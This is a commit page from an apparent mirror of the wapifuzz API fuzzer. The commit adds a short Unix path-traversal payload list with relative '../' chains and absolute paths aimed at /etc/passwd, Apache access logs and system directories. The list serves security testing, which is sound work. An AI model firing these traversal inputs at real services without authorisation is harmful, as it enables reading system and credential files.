mirror of
https://github.com/ysoftdevs/wapifuzz.git
synced 2026-04-25 01:58:48 +02:00
Folder removed
This commit is contained in:
16
fuzzer/payloads/lists/path-traversal/existing-files-unix.txt
Normal file
16
fuzzer/payloads/lists/path-traversal/existing-files-unix.txt
Normal file
@@ -0,0 +1,16 @@
|
||||
# RELATIVE PATHS
|
||||
../../../../../../../../../../../../../../../../../apache/logs/access.log
|
||||
../../../../../../../../../../../../../../../../../etc/passwd
|
||||
../../../../../../../../../../../../../../../../../apache/logs/
|
||||
../../../../../../../../../../../../../../../../../etc/
|
||||
../../../../../../../../../../../../../../../../../opt/
|
||||
../../../../../../../../../../../../../../../../../var/
|
||||
|
||||
|
||||
# ABSOLUTE PATHS
|
||||
/apache/logs/access.log
|
||||
/etc/passwd
|
||||
/apache/logs/
|
||||
/etc/
|
||||
/opt/
|
||||
/var/
|
||||
Reference in New Issue
Block a user